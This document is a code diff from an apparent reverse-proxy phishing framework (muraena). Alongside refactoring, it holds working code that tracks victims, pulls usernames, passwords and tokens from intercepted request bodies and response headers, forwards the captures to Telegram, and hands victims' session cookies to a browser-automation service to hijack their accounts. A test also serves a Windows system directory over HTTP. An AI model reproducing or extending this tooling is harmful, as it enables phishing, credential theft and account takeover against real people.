// wildcard = strings.TrimSuffix(wildcard, fmt.Sprintf(".%s", r.Phishing))
domain := fmt.Sprintf("%s.%s", subdomain, r.patchWildcard(wildcard))
log.Info("Wildcard to patch: %s (%s)", tui.Bold(tui.Red(result)), tui.Green(domain))
@ -298,10 +306,10 @@ func (r *Replacer) PatchComposedWildcardURL(URL string) (result string) {
return
}
//origins := r.GetOrigins()
//if sub, ok := origins[domain]; ok {
// origins := r.GetOrigins()
// if sub, ok := origins[domain]; ok {
// log.Info("%s is mapped to %s", tui.Bold(tui.Red(domain)), tui.Green(sub))
//}
// }
if err := r.Save(); err != nil {
log.Error("Error saving replacer: %s", err)
@ -332,7 +340,7 @@ func transformBase64(input string, b64 Base64, decode bool, padding rune) (outpu
}
}
} else {
//encode
// encode
return base64Encode(input, padding), base64Found, padding
}
}
@ -447,7 +455,7 @@ func (r *Replacer) patchWildcardList(rep []string) (prep []string) {
wildcard := strings.Split(s, CustomWildcardSeparator)[1]
wildcard = strings.Split(wildcard, "/")[0]
//domain := r.patchWildcard(s)
// domain := r.patchWildcard(s)
domain := fmt.Sprintf("%s.%s", subdomain, r.patchWildcard(wildcard))
if domain != "" {
prep = append(prep, domain)
@ -493,6 +501,14 @@ func (r *Replacer) MakeReplacements() {
r.SetForwardReplacements([]string{})
r.SetForwardReplacements(append(r.ForwardReplacements, []string{r.Phishing, r.Target}...))
// Add the SubdomainMap to the forward replacements
for _, sub := range r.SubdomainMap {
from := fmt.Sprintf("%s.%s", sub, r.Phishing)
to := fmt.Sprintf("%s.%s", sub, r.Target)
rep := []string{from, to}
r.SetForwardReplacements(append(r.ForwardReplacements, rep...))
}
log.Verbose("[Forward | Origins]: %d", len(origins))
count := len(r.ForwardReplacements)
for extOrigin, subMapping := range origins { // changes resource-1.phishing.
@ -530,6 +546,14 @@ func (r *Replacer) MakeReplacements() {
r.SetBackwardReplacements([]string{})
r.SetBackwardReplacements(append(r.BackwardReplacements, []string{r.Target, r.Phishing}...))
// Add the SubdomainMap to the backward replacements
for _, sub := range r.SubdomainMap {
from := fmt.Sprintf("%s.%s", sub, r.Target)
to := fmt.Sprintf("%s.%s", sub, r.Phishing)
rep := []string{from, to}
r.SetBackwardReplacements(append(r.BackwardReplacements, rep...))
}
count = 0
for include, subMapping := range origins {
@ -562,10 +586,10 @@ func (r *Replacer) MakeReplacements() {
// These should be done as Final replacements
r.SetLastBackwardReplacements([]string{})
// Custom HTTP response replacements
// CustomContent HTTP response replacements
for _, tr := range r.CustomResponseTransformations {
r.SetLastBackwardReplacements(append(r.LastBackwardReplacements, tr...))
log.Verbose("[Custom Replacements] %+v", tr)
log.Verbose("[CustomContent Replacements] %+v", tr)
}
r.SetLastBackwardReplacements(append(r.BackwardReplacements, r.LastBackwardReplacements...))
@ -574,7 +598,7 @@ func (r *Replacer) MakeReplacements() {
func (r *Replacer) DomainMapping() (err error) {
baseDom := r.Target
//log.Debug("Proxy destination: %s", tui.Bold(tui.Green("*."+baseDom)))
// log.Debug("Proxy destination: %s", tui.Bold(tui.Green("*."+baseDom)))
origins := make(map[string]string)
r.WildcardMapping = make(map[string]string)
@ -603,14 +627,14 @@ func (r *Replacer) DomainMapping() (err error) {
o := fmt.Sprintf("%s%d", prefix, wildcards)
r.SetWildcardDomain(o)
r.SetWildcardMapping(domain, o)
//log.Debug(fmt.Sprintf("*.%s=%s", domain, o))
// log.Debug(fmt.Sprintf("*.%s=%s", domain, o))
} else {
count++
// Extra domains or nested subdomains
o := fmt.Sprintf("%s%d", r.ExternalOriginPrefix, count)
origins[domain] = o
//log.Debug(fmt.Sprintf("%s=%s", domain, o))
// log.Debug(fmt.Sprintf("%s=%s", domain, o))
}
}
@ -620,6 +644,6 @@ func (r *Replacer) DomainMapping() (err error) {
}
r.SetOrigins(origins)
//log.Verbose("Processed %d domains to transform, %d are wildcards", count, wildcards)
// log.Verbose("Processed %d domains to transform, %d are wildcards", count, wildcards)
return
}

View file

@ -13,7 +13,6 @@ import (
)
func main() {
sess, err := session.New()
if err != nil {
fmt.Println(err)

View file

@ -72,18 +72,18 @@ func (module *Crawler) Prompt() {
// Load configures the module by initializing its main structure and variables
func Load(s *session.Session) (m *Crawler, err error) {
config := s.Config.Crawler
config := s.Config
m = &Crawler{
SessionModule: session.NewSessionModule(Name, s),
Enabled: config.Enabled,
UpTo: config.UpTo,
Depth: config.Depth,
Enabled: config.Crawler.Enabled,
UpTo: config.Crawler.UpTo,
Depth: config.Crawler.Depth,
}
rgxURLS = xurls.Strict()
// Armor domains
config.ExternalOrigins = proxy.ArmorDomain(config.ExternalOrigins)
config.Origins.ExternalOrigins = proxy.ArmorDomain(config.Origins.ExternalOrigins)
if !m.Enabled {
m.Debug("is disabled")
return
@ -91,7 +91,7 @@ func Load(s *session.Session) (m *Crawler, err error) {
m.explore()
m.SimplifyDomains()
config.ExternalOrigins = m.Domains
config.Origins.ExternalOrigins = m.Domains
m.Info("Domain crawling stats:")
err = s.UpdateConfiguration(&m.Domains)
@ -102,7 +102,7 @@ func Load(s *session.Session) (m *Crawler, err error) {
func (module *Crawler) explore() {
waitGroup.Wait()
// Custom client
// CustomContent client
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
@ -174,7 +174,7 @@ func (module *Crawler) explore() {
module.Info("Starting exploration of %s (crawlDepth:%d crawlMaxReq: %d), just a few seconds...",
config.Proxy.Target, module.Depth, module.UpTo)
dest := fmt.Sprintf("%s%s", config.Protocol, config.Proxy.Target)
dest := fmt.Sprintf("%s%s", config.Proxy.Protocol, config.Proxy.Target)
err := c.Visit(dest)
if err != nil {
module.Info("Exploration error visiting %s: %s", dest, tui.Red(err.Error()))

View file

@ -84,7 +84,7 @@ func Load(s *session.Session) (m *Necrobrowser, err error) {
m = &Necrobrowser{
SessionModule: session.NewSessionModule(Name, s),
Enabled: s.Config.NecroBrowser.Enabled,
Enabled: s.Config.Necrobrowser.Enabled,
}
if !m.Enabled {
@ -92,7 +92,7 @@ func Load(s *session.Session) (m *Necrobrowser, err error) {
return
}
config := s.Config.NecroBrowser
config := s.Config.Necrobrowser
m.Endpoint = config.Endpoint
m.Profile = config.Profile
@ -107,19 +107,19 @@ func Load(s *session.Session) (m *Necrobrowser, err error) {
// spawn a go routine that checks all the victims cookie jars every N seconds
// to see if we have any sessions ready to be instrumented
if s.Config.NecroBrowser.Enabled {
if s.Config.Necrobrowser.Enabled {
m.Info("enabled")
go m.CheckSessions()
m.Info("trigger delay every %d seconds", s.Config.NecroBrowser.Trigger.Delay)
m.Info("trigger delay every %d seconds", s.Config.Necrobrowser.Trigger.Delay)
}
return
}
func (module *Necrobrowser) CheckSessions() {
triggerType := module.Session.Config.NecroBrowser.Trigger.Type
triggerDelay := module.Session.Config.NecroBrowser.Trigger.Delay
triggerType := module.Session.Config.Necrobrowser.Trigger.Type
triggerDelay := module.Session.Config.Necrobrowser.Trigger.Delay
for {
switch triggerType {
@ -136,7 +136,7 @@ func (module *Necrobrowser) CheckSessions() {
}
func (module *Necrobrowser) CheckSessionCookies() {
triggerValues := module.Session.Config.NecroBrowser.Trigger.Values
triggerValues := module.Session.Config.Necrobrowser.Trigger.Values
victims, err := db.GetAllVictims()
if err != nil {
@ -154,7 +154,7 @@ func (module *Necrobrowser) CheckSessionCookies() {
// if we find the cookies, and the session has not been already instrumented (== false), then instrument
if cookiesNeeded == cookiesFound && !v.SessionInstrumented {
//create Credential struct
// create Credential struct
type Creds struct {
Username string `json:"username"`
Password string `json:"password"`
@ -232,12 +232,12 @@ func (module *Necrobrowser) Instrument(victimID string, cookieJar []db.VictimCoo
module.Info("instrumenting %s", tui.Bold(tui.Red(victimID)))
client := resty.New()
resp, err := client.R().
SetHeader("Content-Type", "application/json").
SetHeader("Content-LandingType", "application/json").
SetBody(newRequest).
Post(module.Endpoint)
if err != nil {
module.Warning("Error sending request to NecroBrowser: %s", err)
module.Warning("Error sending request to Necrobrowser: %s", err)
return
}

View file

@ -3,9 +3,13 @@ package statichttp
import (
"fmt"
"log"
"net"
"net/http"
"net/url"
"path/filepath"
"strings"
"sync"
"github.com/evilsocket/islazy/tui"
@ -26,15 +30,9 @@ const (
// StaticHTTP module
type StaticHTTP struct {
session.SessionModule
Enabled bool
mux *http.ServeMux
address string
listeningPort int
Protocol string
ListeningHost string
LocalPath string
URLPath string
config session.StaticHTTPConfig
mux *http.ServeMux `toml:"-"`
address string `toml:"-"`
}
// Name returns the module name
@ -62,24 +60,16 @@ func Load(s *session.Session) (m *StaticHTTP, err error) {
m = &StaticHTTP{
SessionModule: session.NewSessionModule(Name, s),
Enabled: s.Config.StaticServer.Enabled,
config: s.Config.StaticServer,
}
if !m.Enabled {
if !m.config.Enabled {
m.Debug("is disabled")
return
}
config := s.Config.StaticServer
m.Protocol = "http://"
m.ListeningHost = "localhost"
m.listeningPort = config.Port
m.LocalPath = config.LocalPath
m.URLPath = config.URLPath
// Enable static server module
if err = m.Start(); err != nil {
m.Debug("Dying")
if err = m.start(); err != nil {
return
}
@ -87,29 +77,59 @@ func Load(s *session.Session) (m *StaticHTTP, err error) {
return
}
func (module *StaticHTTP) configure() error {
// Debugging wrapper around the file server
func (module *StaticHTTP) logFileServer(handler http.Handler, localPath string) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
filePath := filepath.Join(localPath, r.URL.Path)
module.Info("Requested %s", filePath)
handler.ServeHTTP(w, r)
}
}
module.address = fmt.Sprintf("127.0.0.1:%d", module.listeningPort)
func (module *StaticHTTP) configure() error {
config := module.config
// :0 means "assign an available port"
module.address = fmt.Sprintf("%s:%d", config.ListeningHost, config.ListeningPort)
module.mux = http.NewServeMux()
path := http.Dir(module.LocalPath)
path := http.Dir(config.LocalPath)
module.Debug("[Static Server] Requested resource: %s", path)
fileServer := http.FileServer(FileSystem{path})
module.mux.Handle(module.URLPath, http.StripPrefix(strings.TrimRight(module.URLPath, "/"), fileServer))
fileServer := http.FileServer(FileSystem{path})
debugFS := module.logFileServer(fileServer, config.LocalPath)
module.mux.Handle(config.URLPath, http.StripPrefix(strings.TrimRight(config.URLPath, "/"), debugFS))
return nil
}
// Start runs the Static HTTP server module
func (module *StaticHTTP) Start() (err error) {
if err := module.configure(); err != nil {
return err
// start runs the Static HTTP server module
func (module *StaticHTTP) start() (err error) {
if err = module.configure(); err != nil {
return
}
go http.ListenAndServe(module.address, module.mux)
listener, err := net.Listen("tcp", module.address)
if err != nil {
log.Fatalf("Error creating listener: %v", err)
}
return nil
// Retrieve the actual address & port assigned by the system
module.address = listener.Addr().String()
module.Info("listening on %s", module.address)
var wg sync.WaitGroup
wg.Add(1)
go func() {
wg.Done() // Signal the server is ready
if err := http.Serve(listener, module.mux); err != nil {
module.Error("%v", err)
}
}()
// Wait for the server to start
wg.Wait()
return
}
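
start now binds its own listener, so a ListeningPort of 0 can mean "pick any free port", with the concrete address read back from the listener before serving. The trick in isolation (ephemeralListen is a hypothetical helper):

package statichttp

import (
    "fmt"
    "net"
)

// ephemeralListen asks the OS for a free port when port is 0 and returns the
// resolved address, e.g. "127.0.0.1:53211".
func ephemeralListen(host string, port int) (net.Listener, string, error) {
    l, err := net.Listen("tcp", fmt.Sprintf("%s:%d", host, port))
    if err != nil {
        return nil, "", err
    }
    return l, l.Addr().String(), nil
}
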
// FileSystem custom file system handler
@ -135,11 +155,10 @@ func (fs FileSystem) Open(path string) (http.File, error) {
return f, nil
}
func (module *StaticHTTP) MakeDestinationURL(URL *url.URL) (destination string) {
destination = ""
if strings.HasPrefix(URL.Path, module.URLPath) {
destination = fmt.Sprintf("%s%s:%d", module.Protocol, module.ListeningHost, module.listeningPort)
// GetNewDestination returns the destination URL for the given request
func (module *StaticHTTP) GetNewDestination(URL *url.URL) (destination string) {
if strings.HasPrefix(URL.Path, module.config.URLPath) {
destination = fmt.Sprintf("http://%s", module.address)
}
return

View file

@ -0,0 +1,44 @@
package statichttp
import (
"testing"
"time"
"github.com/muraenateam/muraena/core"
"github.com/muraenateam/muraena/log"
"github.com/muraenateam/muraena/session"
)
// init test
func init() {
opt := core.GetDefaultOptions()
opt.Debug = &[]bool{true}[0]
log.Init(opt, false, "")
}
func TestStaticHTTP_Start(t *testing.T) {
s := &session.Session{}
s.Config = &session.Configuration{}
s.Config.StaticServer = session.StaticHTTPConfig{
Enabled: true,
// ListeningHost: "",
// ListeningPort: 9090,
LocalPath: "c:\\windows\\system32\\",
URLPath: "/test/",
}
_, err := Load(s)
if err != nil {
t.Fatal(err)
}
t.Log("StaticHTTP started successfully")
// Sleep for 2minutes
time.Sleep(2 * time.Minute)
t.Log("StaticHTTP stopped successfully")
}

View file

@ -1,9 +1,10 @@
package tracking
import (
//"encoding/json"
// "encoding/json"
"encoding/json"
"fmt"
"net"
"net/http"
"net/url"
"path"
@ -13,6 +14,7 @@ import (
"time"
"github.com/manifoldco/promptui"
"github.com/muraenateam/muraena/log"
"github.com/muraenateam/muraena/module/telegram"
@ -45,15 +47,24 @@ const (
var DisabledExtensions = strings.Split(strings.ToLower(blockExtension), ",")
var DisabledMedia = strings.Split(strings.ToLower(blockMedia), ",")
type LandingType int
const (
LandingPath LandingType = iota
LandingQuery
)
// Tracker object structure
// Tracker module
type Tracker struct {
session.SessionModule
Enabled bool
Type string
Type LandingType
Identifier string
Header string
Landing string
LandingHeader string
ValidatorRegex *regexp.Regexp
TrackerLength int
}
@ -125,9 +136,18 @@ func Load(s *session.Session) (m *Tracker, err error) {
m = &Tracker{
SessionModule: session.NewSessionModule(Name, s),
Enabled: s.Config.Tracking.Enabled,
Header: "If-Range", // Default HTTP Header
Landing: "If-Landing-Redirect", // Default Landing HTTP Header
Type: strings.ToLower(s.Config.Tracking.Type),
Header: "If-Range", // Default HTTP Header
LandingHeader: "If-LandingHeader-Redirect", // Default LandingHeader HTTP Header
// Type: strings.ToLower(s.Config.Tracking.Trace.Landing.Type),
}
switch strings.ToLower(s.Config.Tracking.Trace.Landing.Type) {
case "path":
m.Type = LandingPath
case "query":
default:
m.Type = LandingQuery
}
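
Go switch cases do not fall through, so the empty case "query": above leaves m.Type at its zero value (LandingPath) when the configuration says "query". A self-contained restatement that makes the query mapping explicit (parseLandingType is illustrative, not part of the commit):

package tracking

import "strings"

// parseLandingType maps the configured landing type string onto the
// LandingType constants declared above, defaulting to LandingQuery.
func parseLandingType(value string) LandingType {
    switch strings.ToLower(value) {
    case "path":
        return LandingPath
    default: // "query" and anything else
        return LandingQuery
    }
}
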
if !m.Enabled {
@ -135,27 +155,27 @@ func Load(s *session.Session) (m *Tracker, err error) {
return
}
config := s.Config.Tracking
config := s.Config.Tracking.Trace
m.Identifier = config.Identifier
// Set tracking header
if s.Config.Tracking.Header != "" {
m.Header = s.Config.Tracking.Header
if s.Config.Tracking.Trace.Header != "" {
m.Header = s.Config.Tracking.Trace.Header
}
// Set landing header
if s.Config.Tracking.Landing != "" {
m.Landing = s.Config.Tracking.Landing
if s.Config.Tracking.Trace.Landing.Header != "" {
m.LandingHeader = s.Config.Tracking.Trace.Landing.Header
}
// Default Trace format is UUIDv4
m.ValidatorRegex = regexp.MustCompile("^[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-4[a-fA-F0-9]{3}-[8|9|aA|bB][a-fA-F0-9]{3" +
"}-[a-fA-F0-9]{12}$")
if config.Regex != "" {
m.ValidatorRegex, err = regexp.Compile(config.Regex)
if config.ValidatorRegex != "" {
m.ValidatorRegex, err = regexp.Compile(config.ValidatorRegex)
if err != nil {
m.Warning("Failed to compile tracking validator regex: %s. Falling back to UUID4.", config.Regex)
m.Warning("Failed to compile tracking validator regex: %s. Falling back to UUID4.", config.ValidatorRegex)
return
}
}
@ -169,6 +189,10 @@ func Load(s *session.Session) (m *Tracker, err error) {
// IsValid validates the tracking value
func (t *Trace) IsValid() bool {
if t.ValidatorRegex == nil {
return false
}
return t.ValidatorRegex.MatchString(t.ID)
}
@ -194,7 +218,7 @@ func isDisabledMediaType(media string, disabledMedia []string) bool {
return false
}
// Media Type handling.
// Media LandingType handling.
// Prevent processing of unwanted media types
media = strings.TrimSpace(strings.ToLower(media))
for _, skip := range disabledMedia {
@ -285,10 +309,10 @@ func (module *Tracker) TrackRequest(request *http.Request) (t *Trace) {
//
// Tracing types: Path || Query (default)
//
if module.Type == "path" {
if module.Type == LandingPath {
tr := module.Session.Config.Tracking
pathRegex := strings.Replace(tr.Identifier, "_", "/", -1) + tr.Regex
pathRegex := strings.Replace(tr.Trace.Identifier, "_", "/", -1) + tr.Trace.ValidatorRegex
re := regexp.MustCompile(pathRegex)
match := re.FindStringSubmatch(request.URL.Path)
@ -297,8 +321,8 @@ func (module *Tracker) TrackRequest(request *http.Request) (t *Trace) {
if len(match) > 0 {
t = module.makeTrace(match[0])
if t.IsValid() {
request.Header.Set(module.Landing, strings.ReplaceAll(request.URL.Path, t.ID, ""))
module.Info("setting %s header to %s", module.Landing, strings.ReplaceAll(request.URL.Path, t.ID, ""))
request.Header.Set(module.LandingHeader, strings.ReplaceAll(request.URL.Path, t.ID, ""))
module.Info("setting %s header to %s", module.LandingHeader, strings.ReplaceAll(request.URL.Path, t.ID, ""))
noTraces = false
isTrackedPath = true
}
@ -351,37 +375,39 @@ func (module *Tracker) TrackRequest(request *http.Request) (t *Trace) {
}
if v.ID == "" {
// Tracking IP
IPSource := request.RemoteAddr
if module.Session.Config.Tracking.IPSource != "" {
IPSource = request.Header.Get(module.Session.Config.Tracking.IPSource)
}
v := &db.Victim{
IPSource := GetRealAddr(request).String()
newVictim := &db.Victim{
ID: t.ID,
IP: IPSource,
UA: request.UserAgent(),
RequestCount: 0,
RequestCount: 1,
FirstSeen: time.Now().UTC().Format("2006-01-02 15:04:05"),
LastSeen: time.Now().UTC().Format("2006-01-02 15:04:05"),
}
module.PushVictim(v)
module.PushVictim(newVictim)
module.Info("[+] victim: %s \n\t%s\n\t%s", tui.Bold(tui.Red(t.ID)), tui.Yellow(IPSource), tui.Yellow(request.UserAgent()))
//module.Debug("[%s] %s://%s%s", request.Method, request.URL.Scheme, request.Host, request.URL.Path)
// module.Debug("[%s] %s://%s%s", request.Method, request.URL.Scheme, request.Host, request.URL.Path)
}
v.RequestCount++
if module.Type == "path" && isTrackedPath {
request.URL.Path = module.Session.Config.Tracking.RedirectTo
if module.Type == LandingPath && isTrackedPath {
if module.Session.Config.Tracking.Trace.Landing.RedirectTo != "" {
targetURL, err := url.ParseRequestURI(module.Session.Config.Tracking.Trace.Landing.RedirectTo)
if err != nil {
log.Error("invalid redirect URL after landing path: %s", err)
} else {
request.URL = targetURL
}
}
}
return
}
// TrackResponse tracks an HTTP Response
func (module *Tracker) TrackResponse(response *http.Response) (victim *db.Victim) {
// func (module *Tracker) TrackResponse(response *http.Response) (victim *db.Victim) {
func (module *Tracker) TrackResponse(response *http.Response) (t *Trace) {
// Do Not Track if not required
if !module.Enabled {
@ -389,7 +415,7 @@ func (module *Tracker) TrackResponse(response *http.Response) (victim *db.Victim
}
trackingFound := false
t := module.makeTrace("")
t = module.makeTrace("")
// Check cookies first to avoid replacing issues
for _, cookie := range response.Request.Cookies() {
@ -404,10 +430,9 @@ func (module *Tracker) TrackResponse(response *http.Response) (victim *db.Victim
// Trace not found in Cookies check If-Range (or custom defined) HTTP Headers
t = module.makeTrace(response.Request.Header.Get(module.Header))
if t.IsValid() {
cookieDomain := module.Session.Config.Proxy.Phishing
if module.Session.Config.Tracking.Domain != "" {
cookieDomain = module.Session.Config.Tracking.Domain
if module.Session.Config.Tracking.Trace.Domain != "" {
cookieDomain = module.Session.Config.Tracking.Trace.Domain
}
module.Info("Setting tracking cookie for domain: %s", cookieDomain)
@ -425,15 +450,18 @@ func (module *Tracker) TrackResponse(response *http.Response) (victim *db.Victim
// Reset trace
t = module.makeTrace("")
} else {
var err error
victim, err = t.GetVictim(t)
if err != nil {
module.Warning("Error: cannot retrieve Victim from tracker: %s", err)
}
}
// else {
// var err error
// victim, err = t.GetVictim(t)
// if err != nil {
// module.Warning("Error: cannot retrieve Victim from tracker: %s", err)
// }
// }
return victim
// return victim
return
}
// ExtractCredentials extracts credentials from a request body and stores within a VictimCredentials object
@ -448,8 +476,7 @@ func (t *Trace) ExtractCredentials(body string, request *http.Request) (found bo
// Investigate body only if the current URL.Path is related to credentials/keys to intercept
// given UrlsOfInterest.Credentials URLs, intercept username/password using patterns defined in the configuration
for _, c := range t.Session.Config.Tracking.Urls.Credentials {
for _, c := range t.Session.Config.Tracking.Secrets.Paths {
// If the URL is a wildcard, then we need to check if the request URL matches the wildcard
matched := false
if strings.HasPrefix(c, "^") && strings.HasSuffix(c, "$") {
@ -459,18 +486,22 @@ func (t *Trace) ExtractCredentials(body string, request *http.Request) (found bo
}
if matched {
//t.Verbose("[%s] there might be credentials here.")
for _, p := range t.Session.Config.Tracking.Patterns {
for _, p := range t.Session.Config.Tracking.Secrets.Patterns {
// Case *sensitive* matching
if strings.Contains(body, p.Matching) {
// Extract it
value := InnerSubstring(body, p.Start, p.End)
if value != "" {
found = true
// Decode URL-encoded values
mediaType := strings.ToLower(request.Header.Get("Content-Type"))
if strings.Contains(mediaType, "urlencoded") {
value, err = url.QueryUnescape(value)
if err != nil {
if v, err := url.QueryUnescape(value); err != nil {
t.Warning("%s", err)
} else {
value = v
}
}
@ -485,10 +516,9 @@ func (t *Trace) ExtractCredentials(body string, request *http.Request) (found bo
return false, err
}
found = true
message := fmt.Sprintf("[%s] [+] credentials: %s", t.ID, tui.Bold(creds.Key))
t.Info("%s=%s", message, tui.Bold(tui.Red(creds.Value)))
// t.Debug("[+] Pattern: %v", p)
t.Info("%s=%s (%s)", message, tui.Bold(tui.Red(creds.Value)), request.URL.Path)
if tel := telegram.Self(t.Session); tel != nil {
tel.Send(message)
}
@ -496,9 +526,79 @@ func (t *Trace) ExtractCredentials(body string, request *http.Request) (found bo
}
}
if found {
break
// if found {
// break
// }
}
}
if found {
t.ShowCredentials()
}
return found, nil
}
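
The secrets patterns work by locating p.Matching in the body and then cutting out whatever sits between the Start and End markers; the InnerSubstring helper that does the cutting is not shown in this diff. An assumed equivalent, for illustration:

package tracking

import "strings"

// innerSubstringSketch returns the text between the first occurrence of start
// and the following occurrence of end, or "" when either marker is missing.
// e.g. innerSubstringSketch("user=bob&passwd=s3cret&next=/", "passwd=", "&")
//      -> "s3cret"
func innerSubstringSketch(body, start, end string) string {
    i := strings.Index(body, start)
    if i < 0 {
        return ""
    }
    rest := body[i+len(start):]
    j := strings.Index(rest, end)
    if j < 0 {
        return ""
    }
    return rest[:j]
}
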
// ExtractCredentialsFromResponseHeaders extracts tracking credentials from response headers.
// It returns true if credentials are found, false otherwise.
func (t *Trace) ExtractCredentialsFromResponseHeaders(response *http.Response) (found bool, err error) {
found = false
victim, err := t.GetVictim(t)
if err != nil {
t.Error("%s", err)
return found, err
}
// Investigate body only if the current URL.Path is related to credentials/keys to intercept
// given UrlsOfInterest.Credentials URLs, intercept username/password using patterns defined in the configuration
for _, c := range t.Session.Config.Tracking.Secrets.Paths {
// If the URL is a wildcard, then we need to check if the request URL matches the wildcard
matched := false
if strings.HasPrefix(c, "^") && strings.HasSuffix(c, "$") {
matched, _ = regexp.MatchString(c, response.Request.URL.Path)
} else {
matched = response.Request.URL.Path == c
}
if matched {
for _, p := range t.Session.Config.Tracking.Secrets.Patterns {
for k, v := range response.Header {
// generate the header string:
// key: value
header := fmt.Sprintf("%s: %s", k, strings.Join(v, " "))
if strings.Contains(header, p.Matching) {
// Extract it
value := InnerSubstring(header, p.Start, p.End)
if value != "" {
creds := &db.VictimCredential{
Key: p.Label,
Value: value,
Time: time.Now().UTC().Format("2006-01-02 15:04:05"),
}
if err = creds.Store(victim.ID); err != nil {
return false, err
}
found = true
message := fmt.Sprintf("[%s] [+] credentials: %s", t.ID, tui.Bold(creds.Key))
t.Info("%s=%s", message, tui.Bold(tui.Red(creds.Value)))
if tel := telegram.Self(t.Session); tel != nil {
tel.Send(message)
}
}
}
}
}
// if found {
// break
// }
}
}
@ -514,7 +614,7 @@ func (t *Trace) ExtractCredentials(body string, request *http.Request) (found bo
// pass the cookies in the CookieJar to necrobrowser to hijack the session
func (t *Trace) HijackSession(request *http.Request) (err error) {
if !t.Session.Config.NecroBrowser.Enabled {
if !t.Session.Config.Necrobrowser.Enabled {
return
}
@ -525,7 +625,7 @@ func (t *Trace) HijackSession(request *http.Request) (err error) {
return
}
for _, c := range t.Session.Config.Tracking.Urls.AuthSession {
for _, c := range t.Session.Config.Necrobrowser.SensitiveLocations.AuthSession {
if request.URL.Path == c {
getSession = true
break
@ -554,3 +654,19 @@ func (t *Trace) HijackSession(request *http.Request) (err error) {
return
}
// GetRealAddr returns the IP address from an http.Request
func GetRealAddr(r *http.Request) net.IP {
if forwarded := r.Header.Get("X-Forwarded-For"); forwarded != "" {
if parts := strings.Split(forwarded, ","); len(parts) > 0 {
// Intermediate nodes append, so first is the original client
return net.ParseIP(strings.TrimSpace(parts[0]))
}
}
addr, _, err := net.SplitHostPort(r.RemoteAddr)
if err == nil {
return net.ParseIP(addr)
}
return net.ParseIP(r.RemoteAddr)
}

View file

@ -69,13 +69,15 @@ func (module *Tracker) ExportSession(id string) {
var cookieJar []necrobrowser.SessionCookie
for _, c := range victim.Cookies {
log.Debug("trying to parse %s with layout %s", c.Expires, timeLayout)
//log.Verbose("trying to parse %s with layout %s", c.Expires, timeLayout)
t, err := time.Parse(timeLayout, c.Expires)
if err != nil {
log.Warning("can't parse Expires field (%s) of cookie %s, skipping cookie", c.Expires, c.Name)
continue
}
// replace :443 with empty string to avoid issues with port number
nc := necrobrowser.SessionCookie{
Name: c.Name,
Value: c.Value,
@ -96,6 +98,7 @@ func (module *Tracker) ExportSession(id string) {
return
}
log.Info("There are %d cookies", len(cookieJar))
log.Info("CookieJar:\n%s", tui.Bold(string(cookieJarJson)))
}
@ -141,5 +144,5 @@ func (module *Tracker) PushCookie(victim *db.Victim, cookie db.VictimCookie) {
return
}
module.Debug("[%s][+] cookie: %s (%s)", victim.ID, tui.Bold(tui.Green(cookie.Name)), tui.Bold(tui.Green(cookie.Domain)))
module.Verbose("[%s][+] cookie: %s (%s)", victim.ID, tui.Bold(tui.Green(cookie.Name)), tui.Bold(tui.Green(cookie.Domain)))
}

View file

@ -10,6 +10,7 @@ import (
"github.com/manifoldco/promptui"
"github.com/muraenateam/muraena/core"
"github.com/muraenateam/muraena/log"
)
type ResponseCode string
@ -64,15 +65,17 @@ func (module *Watchdog) PromptResponseAction() {
}
}
// BlockRequest takes action and send the visitor to a chosen destination, i.e. blocks or trolls him
// CustomResponse takes action and send the visitor to a chosen destination, i.e. blocks or trolls him
func (module *Watchdog) CustomResponse(response http.ResponseWriter, request *http.Request) {
switch module.Action.Code {
case rNginx404:
log.Debug("Sending Nginx 404 page")
module.NginxNotFound(response, request)
case rCustom301:
log.Debug("Sending custom 301 page: %s", module.Action.TargetURL)
module.CustomMovedPermanently(response, request, module.Action.TargetURL)
}
}

View file

@ -552,7 +552,7 @@ func (module *Watchdog) Allow(r *http.Request) bool {
continue
}
// Regex can apply to:
// ValidatorRegex can apply to:
// - UserAgent
// - IP/Network/Etc.
@ -631,7 +631,7 @@ func (module *Watchdog) Allow(r *http.Request) bool {
}
if !allow {
module.Error("Blocked visitor [%s/%s]", tui.Red(ip.String()), tui.Red(ua))
module.Important("Blocked %s (ua: %s)", tui.Red(ip.String()), tui.Red(ua))
}
return allow
@ -677,7 +677,6 @@ func (module *Watchdog) MonitorRules() {
// GetRealAddr returns the IP address from an http.Request
func GetRealAddr(r *http.Request) net.IP {
if forwarded := r.Header.Get("X-Forwarded-For"); forwarded != "" {
if parts := strings.Split(forwarded, ","); len(parts) > 0 {
// Intermediate nodes append, so first is the original client
@ -689,8 +688,8 @@ func GetRealAddr(r *http.Request) net.IP {
if err == nil {
return net.ParseIP(addr)
}
return net.ParseIP(r.RemoteAddr)
// return net.ParseIP(proxy.GetSenderIP(r))
}
// GetUserAgent returns the User-Agent string from an http.Request

View file

@ -4,6 +4,7 @@ import (
"fmt"
"io/ioutil"
"os"
"regexp"
"strings"
"github.com/pelletier/go-toml"
@ -12,35 +13,62 @@ import (
"github.com/muraenateam/muraena/core"
)
const (
DefaultIP = "0.0.0.0"
DefaultListener = "tcp"
DefaultHTTPPort = 80
DefaultHTTPSPort = 443
var (
DefaultIP = "0.0.0.0"
DefaultListener = "tcp"
DefaultHTTPPort = 80
DefaultHTTPSPort = 443
DefaultBase64Padding = []string{"=", "."}
DefaultSkipContentType = []string{"font/*", "image/*"}
)
// Configuration
type Configuration struct {
Protocol string `toml:"-"`
SkipExtensions []string `toml:"-"`
type Redirect struct {
Hostname string `toml:"hostname"`
Path string `toml:"path"`
Query string `toml:"query"`
RedirectTo string `toml:"redirectTo"`
HTTPStatusCode int `toml:"httpStatusCode"`
}
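
The Redirect struct above backs the new Redirects list (replacing the old Drop entries) and is loaded from [[redirect]] tables in the TOML configuration. An illustrative entry, decoded here with the go-toml package this file already imports (hostname, path and target values are made up; exampleRedirects is not part of the commit):

package session

import "github.com/pelletier/go-toml"

// exampleRedirects decodes a sample [[redirect]] block into the Redirect
// struct defined above. A zero httpStatusCode falls back to 302 at runtime,
// as handled in getHTTPRedirect.
func exampleRedirects() ([]Redirect, error) {
    raw := []byte(`
[[redirect]]
hostname = "www.phishing.tld"
path = "/logout"
redirectTo = "https://www.example.com/"
httpStatusCode = 302
`)
    var cfg struct {
        Redirects []Redirect `toml:"redirect"`
    }
    err := toml.Unmarshal(raw, &cfg)
    return cfg.Redirects, err
}
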
type StaticHTTPConfig struct {
Enabled bool `toml:"enable"`
LocalPath string `toml:"localPath"`
URLPath string `toml:"urlPath"`
ListeningHost string `toml:"listeningHost"`
